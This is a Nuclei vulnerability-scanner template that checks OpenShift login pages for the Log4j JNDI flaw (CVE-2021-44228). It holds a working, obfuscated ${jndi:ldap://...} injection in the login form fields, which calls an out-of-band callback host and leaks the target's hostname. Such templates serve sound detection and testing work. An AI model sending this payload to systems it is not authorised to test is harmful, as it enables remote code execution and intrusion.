nuclei-templates/http/vulnerabilities/other/openshift-log4j-rce.yaml

65 lines
2.5 KiB
YAML
Raw Normal View History

2023-10-18 20:00:15 +00:00
id: openshift-log4j-rce
info:
name: OpenShift - Remote Code Execution (Apache Log4j)
2023-10-19 07:28:29 +00:00
author: shaikhyaser
2023-10-18 20:00:15 +00:00
severity: critical
description: |
OpenShift is susceptible to Log4j JNDI remote code execution. OpenShift is a unified platform to build, modernize, and deploy applications at scale.
reference:
- https://access.redhat.com/security/cve/cve-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
2023-10-19 07:28:29 +00:00
shodan-query: title:"OpenShift"
2023-10-18 20:00:15 +00:00
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,openshift,oast,kev
2023-10-19 07:28:29 +00:00
2023-10-18 20:00:15 +00:00
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
2023-10-19 07:28:29 +00:00
str: "{{rand_base(5)}}"
2023-10-18 20:00:15 +00:00
http:
- raw:
- |
POST /Login HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
2023-10-19 07:28:29 +00:00
Referer: {{RootURL}}/login?then=/oauth/authorize?client_id=openshift-web-console&idp=basic&redirect_uri={{BaseURL}}/console/oauth&response_type
2023-10-18 20:00:15 +00:00
Content-Type: application/x-www-form-urlencoded
2023-10-19 07:28:29 +00:00
then=%2Foauth%2Fauthorize%3Fclient_id%3Dopenshift-web-console%26idp%3Dbasic%26redirect_uri%3D${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}26response_type%3Dcode&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}
2023-10-18 20:00:15 +00:00
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output#
extractors:
- type: kval
kval:
- interactsh_ip #Print remote interaction IP in output
- type: regex
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print injection point in output
part: interactsh_request
- type: regex
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request
# digest: 490a004630440220250c82dc313ec73b477c1bac7177412b08e64db3bfbdf1962143eedacf749f370220084f7356154332463d22594f8dc36e039bc4cb3e849bd97a3649eef7dd6a8e2e:922c64590222798bb761d5b6d8e72950